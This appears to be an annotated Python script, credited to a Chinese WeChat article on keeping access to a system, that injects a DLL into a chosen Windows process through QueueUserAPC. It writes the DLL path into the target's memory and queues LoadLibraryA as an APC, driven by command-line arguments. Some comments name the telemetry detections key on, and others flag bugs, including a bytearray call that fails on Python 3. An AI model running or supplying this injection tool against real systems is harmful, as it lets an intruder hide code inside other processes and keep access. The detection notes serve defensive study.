https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
DWORD QueueUserAPC(
PAPCFUNC pfnAPC,
HANDLE hThread,
ULONG_PTR dwData
);
# Excerpt of the APC-queuing step; the complete listing follows below.
# `handle` (kernel32 module handle), `tid` and `arg_address` (remote buffer
# holding the DLL path) are defined by the surrounding code, not here.
LLA = ctypes.windll.kernel32.GetProcAddress(handle, b'LoadLibraryA')
# Matches the PAPCFUNC prototype linked above: void (*)(ULONG_PTR).
PAPCFUNC = ctypes.WINFUNCTYPE(None,LPVOID)
# Wrap the raw address so ctypes marshals it as a function pointer.
start = PAPCFUNC(LLA)
# THREAD_SET_CONTEXT is the only access right the QueueUserAPC documentation
# requires on the thread handle.
THREAD_SET_CONTEXT = 0x0010
h_thread = ctypes.windll.kernel32.OpenThread(THREAD_SET_CONTEXT, False, int(tid))
ctypes.windll.kernel32.QueueUserAPC.argtypes = LPVOID,HANDLE,LPVOID
# Queue LoadLibraryA(arg_address) on the target thread; per the linked
# documentation the APC runs when that thread next enters an alertable wait.
# The return value (0 on failure) is not checked.
ctypes.windll.kernel32.QueueUserAPC(start, h_thread, arg_address)
import ctypes
from ctypes import *
from ctypes.wintypes import *
import sys,os
def inject(file,pid,tid):
    """Queue a LoadLibraryA user-mode APC in a remote process so it loads *file*.

    Args:
        file: Path of the DLL; resolved with os.path.abspath and written to
            the target as bytes.
        pid: Target process id (str or int; converted with int()).
        tid: Id of a thread inside that process that receives the APC.

    Returns:
        None. If OpenProcess fails, prints a message and calls sys.exit().

    Side effects: opens a process handle and a thread handle, allocates and
    writes memory in the target, queues an APC, then closes both handles.
    Apart from OpenProcess, no kernel32 return value is checked.
    """
    # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF == 0x001F0FFF, i.e. the
    # full access mask. A handle to a foreign process opened with this mask is
    # a common telemetry signal (e.g. Sysmon Event ID 10 / ProcessAccess,
    # GrantedAccess field).
    PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
    h_process = ctypes.windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if h_process:
        dll_path = os.path.abspath(file)
        print(dll_path)
        # NOTE(review): bytearray(str) without an encoding is Python 2
        # behaviour; on Python 3 this line raises TypeError.
        dll_path = bytearray(dll_path)
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x04 = PAGE_READWRITE: a
        # read/write region in the target sized to the path string.
        # Cross-process VirtualAllocEx + WriteProcessMemory followed by an
        # APC queue is the sequence injection detections typically key on.
        arg_address = ctypes.windll.kernel32.VirtualAllocEx(h_process, ctypes.c_int(0), ctypes.c_int(len(dll_path)),ctypes.c_int(0x3000), ctypes.c_int(0x04))
        # Zero-copy view of the path bytes for WriteProcessMemory.
        buf = (ctypes.c_char * len(dll_path)).from_buffer(dll_path)
        # The remote copy of the path becomes LoadLibraryA's argument.
        ctypes.windll.kernel32.WriteProcessMemory(h_process, arg_address, buf, len(dll_path))
        ctypes.windll.kernel32.GetModuleHandleW.argtypes = [c_wchar_p]
        ctypes.windll.kernel32.GetModuleHandleW.restype = c_void_p
        handle = ctypes.windll.kernel32.GetModuleHandleW("kernel32")
        ctypes.windll.kernel32.GetProcAddress.argtypes = [c_void_p, c_char_p]
        ctypes.windll.kernel32.GetProcAddress.restype = c_void_p
        # Resolved in *this* process; presumably relies on kernel32 being
        # mapped at the same base in the target — an implicit assumption the
        # code does not verify.
        LLA = ctypes.windll.kernel32.GetProcAddress(handle, b'LoadLibraryA')
        print("LoadLibraryA:{}".format(LLA))
        # PAPCFUNC prototype: void (*)(ULONG_PTR); wrapping the address makes
        # ctypes pass it as a function pointer.
        PAPCFUNC = ctypes.WINFUNCTYPE(None,LPVOID)
        start = PAPCFUNC(LLA)
        # Minimum right QueueUserAPC requires on the thread handle.
        THREAD_SET_CONTEXT = 0x0010
        h_thread = ctypes.windll.kernel32.OpenThread(THREAD_SET_CONTEXT, False, int(tid))
        ctypes.windll.kernel32.QueueUserAPC.argtypes = LPVOID,HANDLE,LPVOID
        # Runs LoadLibraryA(arg_address) when the target thread next enters an
        # alertable wait (see the QueueUserAPC documentation linked above).
        ctypes.windll.kernel32.QueueUserAPC(start, h_thread, arg_address)
        ctypes.windll.kernel32.CloseHandle(h_thread)
        ctypes.windll.kernel32.CloseHandle(h_process)
    else:
        print("open process error")
        # Exits with status 0 even though this is the failure path.
        sys.exit()
if __name__ == '__main__':
    # CLI: <script> <dll path> <pid> <tid>; a missing argument raises IndexError.
    inject(sys.argv[1],sys.argv[2],sys.argv[3])
本文始发于微信公众号(XG小刚):维持访问-QueueUserAPC注入分析